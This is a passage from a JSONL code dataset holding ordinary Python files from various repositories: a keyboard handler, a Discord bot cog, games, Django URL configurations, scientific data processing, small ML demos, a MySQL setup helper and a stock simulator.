input\n\t\t\tif select.select([sys.stdin,], [], [], _timeout)[0]:\n\t\t\t\tch = sys.stdin.read(1)\n\t\t\t\tif ch == '\\x1b':\n\t\t\t\t\tch2 = sys.stdin.read(1)\n\t\t\t\t\tif ch2 == '[':\n\t\t\t\t\t\tch3 = sys.stdin.read(1)\n\t\t\t\t\t\tch += ch2 + ch3\n\t\t\telse:\n\t\t\t\tch = None\n\t\tfinally:\n\t\t\ttermios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n\t\treturn ch\n\t\n\tdef flushInput() -> None:\n\t\tsys.stdin.flush()\n\n\nCommands = Dict[str, Callable[[str], None]]\n\"\"\" Mapping between characters and callback functions. \"\"\"\n\n_stopLoop = False\n\"\"\" Internal variable to indicate to stop the keyboard loop. \"\"\"\n\n\ndef loop(commands:Commands, quit:str = None, catchKeyboardInterrupt:bool = False, headless:bool = False, ignoreException:bool = True, catchAll:Callable = None) -> None:\n\t\"\"\"\tEndless loop that reads single chars from the keyboard and then executes\n\t\ta handler function for that key (from the dictionary `commands`).\n\t\tIf a single 'key' value is set in `quit` and this key is pressed, then\n\t\tthe loop terminates.\n\n\t\tIf `catchKeyboardInterrupt` is True, then this key is handled as the ^C key,\n\t\totherweise a KeyboardInterrupt event is raised.\n\n\t\tIf `headless` is True, then operate differently. Ignore all key inputs, but handle\n\t\ta keyboard interrupt. If the `quit` key is set then the loop is just interrupted. Otherwise\n\t\ttread the keyboard interrupt as ^C key. It must be hanled in the `commands`.\n\n\t\tIf `ignoreException` is True, then exceptions raised during command execution is ignore, or\n\t\tpassed on otherwise.\n\n\t\tIf `catchAll` is given then this callback is called in case the pressed key was not found\n\t\tin `commands`.\n\t\"\"\"\n\t\n\t# main loop\n\tch:str = None\n\twhile True:\t\n\n\t\t# normal console operation: Get a key. Catch a ctrl-c keyboard interrup and handle it according to configuration\n\t\tif not headless:\n\t\t\ttry:\n\t\t\t\tch = getch() # this also returns the key pressed, if you want to store it\n\t\t\t\tif isinstance(ch, bytes):\t# Windows getch() returns a byte-string\n\t\t\t\t\tch = ch.decode('utf-8') # type: ignore [attr-defined]\n\t\t\texcept KeyboardInterrupt as e:\n\t\t\t\tflushInput()\n\t\t\t\tif catchKeyboardInterrupt:\n\t\t\t\t\tch = '\\x03'\n\t\t\t\telse:\n\t\t\t\t\traise e \n\t\t\texcept Exception:\t# Exit the loop when there is any other problem\n\t\t\t\tbreak\n\n\t\t\t# handle \"quit\" key\t\t\t\n\t\t\tif quit is not None and ch == quit:\n\t\t\t\tbreak\n\t\t\t\n\t\t# When headless then look only for keyboard interrup\n\t\tif _stopLoop:\n\t\t\tbreak\n\t\t\t# Just break?\n\t\t\tif quit is not None or not '\\x03' in commands:\t# shortcut: if there is a quit key OR ^C is not in the commands, then just return from the loop\n\t\t\t\tbreak\n\t\t\tch = '\\x03'\t\t\t\t\t\t\t\t\t\t# Assign ^C\n\n\t\t# hande potential headless state: just sleep a moment, but only when not keyboad interrupt was received\n\t\tif headless and not _stopLoop:\n\t\t\ttry:\n\t\t\t\ttime.sleep(0.2)\n\t\t\t\tcontinue\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tbreak\n\n\t\t# handle all other keys\n\t\tif ch in commands:\n\t\t\ttry:\n\t\t\t\tcommands[ch](ch)\n\t\t\texcept SystemExit:\n\t\t\t\traise\n\t\t\texcept Exception as e:\n\t\t\t\tif not ignoreException:\n\t\t\t\t\traise e\n\t\telif ch and catchAll:\n\t\t\tcatchAll(ch)\n\n\ndef stopLoop() -> None:\n\t\"\"\"\tStop the keyboard loop.\n\t\"\"\"\n\tglobal _stopLoop\n\t_stopLoop = True\n\n\ndef readline(prompt:str='>') -> str:\n\t\"\"\"\tRead a line from the console. \n\t\tCatch EOF (^D) and Keyboard Interrup (^C). I that case None is returned.\n\t\"\"\"\n\tanswer = None\n\ttry:\n\t\tresult = input(prompt)\n\texcept KeyboardInterrupt as e:\n\t\tpass\n\texcept Exception:\n\t\tpass\n\treturn answer\n\ndef waitForKeypress(s:float) -> str:\n\tfor i in range(0, int(s * 1.0 / _timeout)):\n\t\tch = None\n\t\ttry:\n\t\t\tch = getch()\t# returns after _timeout s\n\t\texcept KeyboardInterrupt as e:\n\t\t\tch = '\\x03'\n\t\texcept Exception:\n\t\t\treturn None\n\t\tif ch is not None:\n\t\t\treturn ch\n\treturn None","repo_name":"ankraft/onem2m-jupyter-notebooks","sub_path":"tools/ACME/acme/helpers/KeyHandler.py","file_name":"KeyHandler.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"42954695605","text":"import discord\r\nfrom discord.ext import commands\r\n\r\n\r\nclass VerifyButton(discord.ui.View):\r\n def __init__(self):\r\n super().__init__(timeout=None)\r\n\r\n @discord.ui.button(label='역할받기', style=discord.ButtonStyle.primary, custom_id='verify-role')\r\n async def role(self, button, interaction):\r\n role = interaction.guild.get_role(1061120395639529562)\r\n await interaction.user.add_roles(role)\r\n return await interaction.response.send_message('역할이 지급되었습니다.', ephemeral=True)\r\n\r\n\r\nclass Join(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.Cog.listener()\r\n async def on_member_join(self, member):\r\n \"\"\"\r\n Member join event handler\r\n :param member: Default param for getting the joined member. Nothing to do for this param\r\n :return\r\n \"\"\"\r\n if member.guild.id != 860930425811894313:\r\n return None\r\n\r\n channel = self.bot.get_channel(860930425811894316)\r\n rule = self.bot.get_channel(1061090011220545547)\r\n embed = discord.Embed(title=\"환영합니다!\", color=0x967969,\r\n description=f\"안녕하세요 {member.mention}님, \"\r\n f\"베어타운에 오신 것을 환영합니다!\\n\"\r\n f\"{rule.mention} 채널에서 서버 규칙을 확인하신 후,\\n\"\r\n f\"채널 하단의 메시지에 버튼을 눌러 역할을 획득해 주세요.\")\r\n embed.set_author(name=member, icon_url=getattr(member.avatar, 'url', self.bot.user.avatar.url))\r\n embed.set_thumbnail(url=member.guild.icon.url)\r\n embed.set_footer(text=\"베어타운\", icon_url=self.bot.user.avatar.url)\r\n return await channel.send(member.mention, embed=embed)\r\n\r\n @commands.command(name='verify')\r\n async def verify_create(self, ctx, channel: discord.TextChannel):\r\n \"\"\"\r\n Create get-role message\r\n :param ctx: Default param for getting the information of the caller. Nothing to do for this param\r\n :param channel: mention a channel to send a get-role message\r\n :return:\r\n \"\"\"\r\n if not ctx.author.guild_permissions.view_audit_log:\r\n return await ctx.respond(\"권한이 없습니다.\", ephemeral=True)\r\n\r\n embed = discord.Embed(title=\"역할받기\", color=0x967969,\r\n description=\"규칙을 숙지하셨다면 아래의 버튼을 눌러 역할을 받아주세요.\")\r\n embed.set_footer(text=\"베어타운\", icon_url=self.bot.user.avatar.url)\r\n await channel.send(embed=embed, view=VerifyButton())\r\n\r\n return await ctx.reply(f\"생성이 완료되었습니다. {channel.mention}\")\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Join(bot))\r\n","repo_name":"qkrwldnjs/beartown-bot","sub_path":"extensions/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14867012183","text":"def draw_field(field):\r\n \r\n print(f' 1 2 3')\r\n print('--------')\r\n for i in range(3):\r\n print( f\"{i+1} {field[i][0]} {field[i][1]} {field[i][2]}\" )\r\n print('--------')\r\n \r\nfield = [[' '] * 3 for i in range(3)]\r\n\r\n# Функция, которая проверяет, выиграл ли кто-то\r\ndef get_winner(field):\r\n# Проверяем строки\r\n for i in range(3):\r\n if field[i][0] == field[i][1] == field[i][2] and field[i][0] != ' ':\r\n return field[i][0]\r\n# Проверяем столбцы\r\n for i in range(3):\r\n if field[0][i] == field[1][i] == field[2][i] and field[0][i] != ' ':\r\n return field[0][i]\r\n# Проверяем диагонали\r\n if field[0][0] == field[1][1] == field[2][2] and field[0][0] != ' ':\r\n return field[0][0]\r\n if field[2][0] == field[1][1] == field[0][2] and field[2][0] != ' ':\r\n return field[2][0]\r\n# Если никто не выиграл, возвращаем None\r\n return None\r\n\r\ndef cords():\r\n while True:\r\n \r\n row = input(\"Введите номер строки: \")\r\n \r\n if not (row.isdigit()):\r\n print('Символ вне диапазона, выбери другй (1, 2 или 3)')\r\n continue\r\n \r\n row = int(row) - 1\r\n \r\n if row < 0 or row > 2:\r\n print('Символ вне диапазона, выбери другй (1, 2 или 3)')\r\n continue\r\n \r\n col = input(\"Введите номер столбца: \")\r\n \r\n if not (col.isdigit()):\r\n print('Символ вне диапазона, выбери другй (1, 2 или 3)')\r\n continue\r\n \r\n col = int(col) - 1\r\n \r\n if col < 0 or col > 2:\r\n print('Символ вне диапазона, выбери другй (1, 2 или 3)')\r\n continue\r\n \r\n if field[row][col] != ' ':\r\n print(\"Эта клетка уже занята, попробуйте еще раз\")\r\n continue\r\n return row, col\r\n\r\n# Запускаем игру\r\ncounter = 0\r\ncurrent_player = 'X'\r\nwhile True:\r\n \r\n draw_field(field)\r\n print(\"Ход игрока\", current_player)\r\n row, col = cords()\r\n \r\n counter += 1\r\n \r\n field[row][col] = current_player\r\n winner = get_winner(field)\r\n if winner:\r\n draw_field(field)\r\n print(\"Выиграл игрок\", winner)\r\n break\r\n if current_player == 'X':\r\n current_player = 'O'\r\n else:\r\n current_player = 'X'\r\n if counter == 9:\r\n draw_field(field)\r\n print('Ничья!')\r\n break","repo_name":"Dyoma09/PDEV28_B5_6_XO","sub_path":"крестики-нолики.py","file_name":"крестики-нолики.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74253457706","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 28 10:22:55 2015\n\n@author: rbanderson\n\"\"\"\nimport numpy\nimport ccam\n\n\ndef target_lookup(filelist,masterlistfile,name_sub_file):\n data,labels=ccam.read_csv(masterlistfile,1,labelrow=True)\n \n targets=numpy.array(data[:,5],dtype='string')\n sclocks=numpy.array(data[:,2],dtype='string')\n dists=numpy.array(data[:,8],dtype='string')\n amps=numpy.array(data[:,17],dtype='string')\n nshots=numpy.array(data[:,11])\n\n \n file_sclocks=numpy.zeros_like(filelist)\n file_targets=numpy.zeros_like(filelist) \n file_amps=numpy.zeros_like(filelist)\n file_dists=numpy.zeros_like(filelist)\n file_nshots=numpy.zeros(len(filelist))\n filelist_unique=numpy.unique(filelist)\n \n for i in range(len(filelist_unique)):\n filelist_ind=filelist==filelist_unique[i]\n file_sclocks[filelist_ind]=filelist_unique[i][-36:-27]\n# if max(sclocks==file_sclocks[filelist_ind_true][0]) is not False:\n#\n# if len(targets[(sclocks==file_sclocks[filelist_ind_true][0])])!=0:\n# file_targets[filelist_ind]=targets[(sclocks==file_sclocks[filelist_ind_true][0])][0]\n# file_dists[filelist_ind]=dists[(sclocks==file_sclocks[filelist_ind_true][0])][0]\n# file_amps[filelist_ind]=amps[(sclocks==file_sclocks[filelist_ind_true][0])][0]\n# file_nshots[filelist_ind]=nshots[(sclocks==file_sclocks[filelist_ind_true][0])][0]\n matchindex1=numpy.in1d(file_sclocks,sclocks)\n matchindex=numpy.in1d(sclocks,file_sclocks)\n file_targets=numpy.zeros(len(filelist),dtype='a400')\n file_dists=numpy.zeros(len(filelist),dtype='a10')\n file_amps=numpy.zeros(len(filelist),dtype='a10')\n file_nshots=numpy.zeros(len(filelist),dtype='int')\n \n file_targets[matchindex1]=targets[matchindex]\n file_dists[matchindex1]=dists[matchindex]\n file_amps[matchindex1]=amps[matchindex]\n file_nshots[matchindex1]=nshots[matchindex]\n data=ccam.read_csv(name_sub_file,0,labelrow=False)\n old_name=data[:,0]\n new_name=data[:,1] \n for i in range(len(old_name)):\n file_targets[(file_targets==old_name[i])]=new_name[i]\n \n return file_targets,file_dists,file_amps,file_nshots","repo_name":"freesiemens/Working","sub_path":"ccam/target_lookup.py","file_name":"target_lookup.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31863459861","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.homer, name=\"index\"),\n path(\"add/\", views.bart, name=\"add\"),\n path(\"/update/\", views.lisa, name=\"update\"),\n path(\"/delete/\", views.barny, name=\"delete\"),\n]\n","repo_name":"peerhoffmanncode/Coding-DCI","sub_path":"InClasses_Training/django/DjangoFromScratch/reminder/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26706638306","text":"#import tensorflow as tf\n\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\n\n\nnode1 = tf.constant(3.0, tf.float32)\nnode2 = tf.constant(4.0) # also tf.float32 implicitly\nnode3 = tf.add(node1, node2)\n\nprint(\"node1:\", node1, \"node2:\", node2)\nprint(\"node3: \", node3)\n#결과는 텐서임을 알려주는것만 출력됨\n\n\nsess = tf.Session()\nprint(\"sess.run(node1, node2): \", sess.run([node1, node2]))\nprint(\"sess.run(node3): \", sess.run(node3))\n#실제결과는 세션을 만들어야지 출력됨\n\n\n","repo_name":"shhan0226/TensorFlow","sub_path":"BasicDeepLearning/Lab1/Lab1-3.Computational_Graph.py","file_name":"Lab1-3.Computational_Graph.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14567572239","text":"import contextlib\nfrom oslocfg import cfg\n\nfrom seafutil.dbengine import DbEngineBase\n\nCONF = cfg.CONF\n\n\nclass DbEngine(DbEngineBase):\n\n ENGINEPREFIX = 'mysql+mysqldb'\n\n\n def tables(self):\n tbs = []\n with self.engine.connect() as conn:\n r = conn.execute(\"show tables\")\n for row in r:\n tbs.append(row[0])\n r.close()\n return tbs\n\n def databases(self):\n dbs = []\n with self.engine.connect() as conn:\n r = conn.execute(\"show databases\")\n for row in r:\n dbs.append(row[0])\n r.close()\n return dbs\n\n def create_db(self):\n sql = \"CREATE DATABASE %s default character set utf8\" % CONF.dbname\n with self.engine.connect() as conn:\n r = conn.execute(sql)\n r.close()\n\n\n def create_user(self):\n _auth = {'schema': CONF.dbname,\n 'user': CONF.dbuser,\n 'passwd': CONF.dbpass,\n 'source': CONF.scope,\n 'privileges': 'ALL'}\n sqls = [\"GRANT %(privileges)s ON %(schema)s.* \"\n \"TO '%(user)s'@'%(source)s' IDENTIFIED by '%(passwd)s'\" % _auth,\n 'FLUSH PRIVILEGES']\n with self.engine.connect() as conn:\n for sql in sqls:\n r = conn.execute(sql)\n r.close()\n\n\n def drop_user(self):\n sqls = [\"DROP USER '%s'@'%s'\" % (CONF.dbuser, CONF.scope),\n 'FLUSH PRIVILEGES']\n with self.engine.connect() as conn:\n for sql in sqls:\n r = conn.execute(sql)\n r.close()\n\n def drop_db(self):\n sql = \"DROP DATABASE %s\" % CONF.dbname\n with self.engine.connect() as conn:\n r = conn.execute(sql)\n r.close()\n\n\n @contextlib.contextmanager\n def _create(self):\n if CONF.dbname in self.databases():\n raise ValueError('Database already exist, try --nocreate')\n try:\n self.create_db()\n self.create_user()\n yield\n except Exception as e:\n self.drop_db()\n self.drop_user()\n raise e\n","repo_name":"lolizeppelin/seafutil","sub_path":"seafutil/dbengine/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19284651235","text":"#!/usr/bin/python\n\n\"\"\"\nZetCode PyQt5 tutorial\n\nThis example shows an icon\nin the titlebar of the window.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com\n\"\"\"\n\nimport sys\nfrom PyQt5.QtCore import Qt, QBasicTimer, pyqtSignal\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDesktopWidget, QFrame\nfrom PyQt5.QtGui import QPainter, QColor, QBrush\n\n\nclass Tetris(QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n \"\"\"initiates application UI\"\"\"\n\n self.tboard = Board(self)\n self.setCentralWidget(self.tboard)\n\n self.statusbar = self.statusBar()\n self.tboard.msg2Statusbar[str].connect(self.statusbar.showMessage)\n self.tboard.start()\n self.resize(180, 380)\n self.center()\n self.setWindowTitle('Tetris')\n self.show()\n\n def center(self):\n screen = QDesktopWidget().screenGeometry()\n size = self.geometry()\n self.move(int((screen.width() - size.width()) / 2),\n int((screen.height() - size.height()) / 2))\n\n\nclass Board(QFrame):\n msg2Statusbar = pyqtSignal(str)\n\n BoardWidth = 10\n BoardHeight = 22\n\n def __init__(self, parent):\n super().__init__(parent)\n\n self.initBoard()\n\n def initBoard(self):\n pass\n\n def squareWidth(self):\n \"\"\"returns the width of one square\"\"\"\n\n return self.contentsRect().width() // Board.BoardWidth\n\n def squareHeight(self):\n \"\"\"returns the height of one square\"\"\"\n\n return self.contentsRect().height() // Board.BoardHeight\n\n def start(self):\n self.msg2Statusbar.emit(\"Ready\")\n\n def paintEvent(self, e):\n painter = QPainter()\n painter.begin(self)\n self.drawBoard(painter)\n painter.end()\n\n def drawBoard(self, painter):\n rect = self.contentsRect()\n boardTop = rect.bottom() - Board.BoardHeight * self.squareHeight()\n\n for i in range(Board.BoardHeight):\n for j in range(Board.BoardWidth):\n self.drawSquare(painter,\n rect.left() + j * self.squareWidth(),\n boardTop + i * self.squareHeight())\n\n def drawSquare(self, painter, x, y):\n color = QColor(200, 0, 0)\n painter.fillRect(x + 1, y + 1, self.squareWidth() - 2,\n self.squareHeight() - 2, color)\n\n\ndef main():\n app = QApplication(sys.argv)\n ex = Tetris()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"genakoganovich/Tetris","sub_path":"tetris_from_scratch/015_tetris.py","file_name":"015_tetris.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19115119297","text":"\"\"\"detector URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nimport views\n\nurlpatterns = [\n url(r'^$', views.MainView.as_view(), name='main'),\n url(r'^get_prev_photo$', 'lightsite.views.get_prev_photo_from_ajax', name=\"get_prev_photo\"),\n url(r'^search_logo$', 'lightsite.views.search_logo_from_ajax', name=\"search_logo\"),\n url(r'^check_image$', 'lightsite.views.check_image_from_ajax', name=\"check_image\"),\n url(r'^save_logo$', 'lightsite.views.save_logo_from_ajax', name=\"save_logo\"),\n url(r'^remove_logo$', 'lightsite.views.remove_logo_from_ajax', name=\"remove_logo\"),\n url(r'^remove_company', 'lightsite.views.remove_company_from_ajax', name=\"remove_company\"),\n url(r'^save_stat', 'lightsite.views.save_stat_from_ajax', name=\"save_stat\"),\n url(r'^company/edit/(?P\\d+)$', views.CompanyEditView.as_view(),\n name='company-edit', ),\n url(r'^company/new$', views.CompanyNewView.as_view(),\n name='company-new', ),\n url(r'^company/(?P\\d+)$', views.CompanyView.as_view(),\n name='company-view', ),\n url(r'^companies$', views.ListCompanyView.as_view(),\n name='company-list', ),\n url(r'^statistic', views.ListStatisticView.as_view(),\n name='statistic-list', ),\n url(r'^admin/statistic', views.ListAdminStatisticView.as_view(),\n name='admin-statistic-list', ),\n url(r'^denied', views.DeniedView.as_view(),\n name='denied', ),\n\n # url(r'^new$', views.CreatePhotoView.as_view(),\n # name='userphoto-new', ),\n # url(r'^list$', views.ListPhotoView.as_view(),\n # name='userphoto-list', ),\n # url(r'^search(?P\\d+)$', views.SearchView.as_view(), name='search-done'),\n # url(r'^search$', views.SearchView.as_view(), name='search'),\n # url(r'^search((?:/(?P\\d+))|(?:/))?$', 'lightsite.views.init_search',\n # name='search'),\n # url(r'^load$', views.load,\n # name='load'),\n]\n","repo_name":"abryazgin/detector","sub_path":"lightsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31531188204","text":"# Author: Hanzi Mao \n#\n# License: BSD 3 clause\n\nfrom .utils import get_lat_lon_bins\nfrom ..utils import get_out_path\n\nimport os\nimport numpy as np\nimport numpy.ma as ma\nfrom netCDF4 import Dataset\nfrom datetime import datetime\n\n\ndef modis_lst_upsample(doy_start, doy_end):\n in_path = os.path.join(\"Data\", \"MOD11A1\", \"500m\")\n out_path = get_out_path(os.path.join(\"Data\", \"MOD11A1\", \"3km\"))\n\n date_start = datetime.strptime(doy_start, \"%Y%m%d\").date()\n date_end = datetime.strptime(doy_end, \"%Y%m%d\").date()\n\n lats, lons, lat_bins, lon_bins = get_lat_lon_bins(\"M03\", 50, 24, -125, -66)\n\n for nc_file in os.listdir(in_path):\n if nc_file.endswith('.nc'):\n nc_date = datetime.strptime(nc_file[:-3], \"%Y%m%d\").date()\n if date_start <= nc_date <= date_end:\n print(nc_file)\n fh = Dataset(os.path.join(in_path, nc_file), 'r')\n fh_out = Dataset(os.path.join(out_path, nc_file), 'w')\n\n dic_var = {}\n for var in ['lat', 'lon']:\n dic_var[var] = fh.variables[var]\n dic_var['lat_value'] = dic_var['lat'][::-1]\n dic_var['lon_value'] = dic_var['lon'][:]\n\n fh_out.createDimension('lat', len(lats))\n fh_out.createDimension('lon', len(lons))\n\n for var in ['lat', 'lon']:\n outVar = fh_out.createVariable(var, 'f4', (var,))\n outVar.setncatts({k: dic_var[var].getncattr(k) for k in dic_var[var].ncattrs()})\n outVar[:] = lats if var == \"lat\" else lons\n\n for var in ['LST_Day_1km', 'LST_Night_1km']:\n fill_value = 0.0\n dic_var[var] = fh.variables[var]\n dic_var[var + '_value'] = dic_var[var][:]\n dic_var[var + '_resampled'] = np.full((len(lats), len(lons)), fill_value)\n for id_lats in range(len(lats)):\n for id_lons in range(len(lons)):\n lats_index = np.searchsorted(dic_var['lat_value'],\n [lat_bins[id_lats + 1], lat_bins[id_lats]])\n lons_index = np.searchsorted(dic_var['lon_value'],\n [lon_bins[id_lons], lon_bins[id_lons + 1]])\n if lats_index[0] != lats_index[1] and lons_index[0] != lons_index[1]:\n selected = dic_var[var + '_value'][np.array(range(-lats_index[1], -lats_index[0]))[:, None],\n np.array(range(lons_index[0], lons_index[1]))]\n avg = ma.mean(selected)\n dic_var[var + '_resampled'][id_lats, id_lons] = (avg if avg is not ma.masked else fill_value)\n\n v_name = \"_\".join(var.split(\"_\")[:-1]) if var in [\"LST_Day_1km\", \"LST_Night_1km\"] else var\n outVar = fh_out.createVariable(v_name, \"f4\", ('lat', 'lon',))\n outVar.setncatts({'units': 'K'})\n outVar.setncatts({'_FillValue': np.array([0]).astype('f4')})\n outVar.setncatts({'valid_min': np.array([7500]).astype('f4')})\n outVar.setncatts({'valid_max': np.array([65535]).astype('f4')})\n outVar.setncatts({k: dic_var[var].getncattr(k) for k in dic_var[var].ncattrs()\n if k not in ['_FillValue', 'valid_min', 'valid_max']})\n outVar[:] = dic_var[var + '_resampled'][:]\n # outVar[:] = ma.masked_less(outVar, 150)\n\n fh.close()\n fh_out.close()\n\n","repo_name":"HannaMao/Gap-Filling-of-Soil-Moisture","sub_path":"data_preprocessing/rescaling/modis_lst.py","file_name":"modis_lst.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"18406799263","text":"# coding=utf-8\n# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlencode\nfrom urllib.request import urlopen, Request\nimport json\nimport ssl\nimport numpy as np\nimport torch\nimport torch as nn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\n\n\n\ndef python_start(name):\n N, D_in, H, D_out = 64, 1000, 100, 10\n x = torch.randn(N, D_in)\n y = torch.randn(N, D_out)\n\n #w1 = torch.randn(D_in, H, requires_grad = True)\n #w2 = torch.randn(H, D_out,requires_grad = True)\n\n model = torch.nn.Sequential(\n torch.nn.Linear(D_in,H),\n torch.nn.ReLU(),\n torch.nn.Linear(H,D_out),\n )\n\n class TwoLayerNet(torch.nn.Module):\n def __init__(self,D_in,H,D_out):\n super(TwoLayerNet,self).__init__() \n self.linear1 = torch.nn.Linear(D_in,H,bias = False)\n self.linear2 = torch.nn.Linear(H,D_out,bias = False)\n def forward(self,x):\n y_pred = self.linear2(self.linear1(x).clamp(min=0))\n return y_pred\n model = TwoLayerNet(D_in,H,D_out)\n \n\n #torch.nn.init.normal(model[0].weight)\n #torch.nn.init.normal(model[2].weight)\n\n loss_fn = torch.nn.MSELoss(reduction='sum')\n learning_rate = 1e-4\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n for it in range(500):\n y_pred = model(x)\n #h = x.mm(w1)\n #h_relu = h.clamp(min = 0) #np.maximum(h,0)\n #y_pred = h_relu.mm(w2)\n\n #loss = np.square(y_pred - y).sum()\n #loss = (y_pred - y).pow(2).sum()\n loss = loss_fn(y_pred,y)\n print(it, loss.item())\n\n #model.zero_grad()\n # grad_y_pred = 2.0 * (y_pred - y)\n #grad_w2 = h_relu.t().mm(grad_y_pred)\n #grad_h_relu = grad_y_pred.mm(w2.t())\n #grad_h = grad_h_relu.clone()\n #grad_h[h<0] = 0\n #grad_w1 = x.t().mm(grad_h)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n #with torch.no_grad():\n \n #w1 -= learning_rate * w1.grad\n #w2 -= learning_rate * w2.grad\n #w1.grad.zero_()\n #w2.grad.zero_()\n\n #for param in model.parameters():\n # param -= learning_rate * param.grad\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n python_start('PyCharm')\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"x5gg/nnn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70046889388","text":"import stocks\n\nprint(\"Welcome to the climate change and finance simulator game!\")\n\nprint(\"Here is a list of the stocks available to invest in.\")\nlist_unique_stocks = []\n\nfor stock in stocks.stocks_chart:\n if ((stock['symbol'] in list_unique_stocks) == False):\n list_unique_stocks.append(stock['symbol'])\nprint(list_unique_stocks)\n\nbalance = int(input(\"What is your current balance?\\n\"))\nsymbol = input(\"What is the symbol of the stock that you would like to buy?\\n\")\nprice = 0\n\nyear = input(\"During which of the years (1990, 2000, 2007) would you like to invest in this stock?\\n\")\n\nfor stock in stocks.stocks_chart:\n if (symbol == stock['symbol']) and (year == stock['year']):\n price = stock['price']\n\nshares_all = balance // price\nprint(\"You are able to buy \" + str(shares_all) + \" shares of stocks \" + symbol + \" with your current balance.\")\nchoice = int(input(\"What would you like to do? \\n1. Buy all \" + str(shares_all) + \" shares\\n2. Buy some shares\\n3. Buy none\\n\" ))\nsell_price = 0\n\nif choice == 1:\n sell_year = input(\"At what year would you like to sell the stocks? (2000, 2007, 2019)\\n\")\n for stock in stocks.stocks_chart:\n if (sell_year == stock['year']) and (symbol == stock['symbol']):\n sell_price = stock['price']\n profit = (sell_price - price) * shares_all\n balance += profit\nelif choice == 2:\n shares = int(input(\"How many shares would you like to buy?\\n\"))\n if shares < shares_all:\n sell_year = input(\"At what year would you like to sell the stocks? (2000, 2007, 2019)\\n\")\n for stock in stocks.stocks_chart:\n if (sell_year == stock['year']) and (symbol == stock['symbol']):\n sell_price = stock['price']\n profit = (sell_price - price) * shares\n balance += profit\n else:\n print(\"Please enter a valid number of shares under \" + str(shares_all))\nelif choice == 3:\n print(\"Thank you. Please come back and find out more about stocks int he future.\")\n \nprint(\"You current balance is \" + str(balance) + \" dollars.\")","repo_name":"CynthiaWu10969/SimulatorProject","sub_path":"mvp.py","file_name":"mvp.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13997372848","text":"from datetime import datetime\nfrom typing import NoReturn\n\nfrom graia.ariadne.event.message import MessageEvent, GroupMessage\nfrom graia.broadcast.builtin.decorators import Depend\n\nfrom library.orm import orm\nfrom library.orm.table import FunctionCallRecord\n\n\nclass FunctionCall:\n @classmethod\n def record(cls, pack: str) -> Depend:\n \"\"\"\n Record function call.\n\n :param pack: Package name.\n :return: Depend decorator.\n \"\"\"\n\n async def function_call_record(event: MessageEvent) -> NoReturn:\n await cls.add_record(\n pack=pack,\n field=event.sender.group.id if isinstance(event, GroupMessage) else 0,\n supplicant=event.sender.id,\n )\n\n return Depend(function_call_record)\n\n @staticmethod\n async def add_record(pack: str, field: int, supplicant: int) -> NoReturn:\n \"\"\"\n Add function call record.\n\n :param pack: Package name.\n :param field: Field.\n :param supplicant: Supplicant.\n :return: NoReturn.\n \"\"\"\n\n await orm.add(\n FunctionCallRecord,\n {\n \"time\": datetime.now(),\n \"field\": field,\n \"supplicant\": supplicant,\n 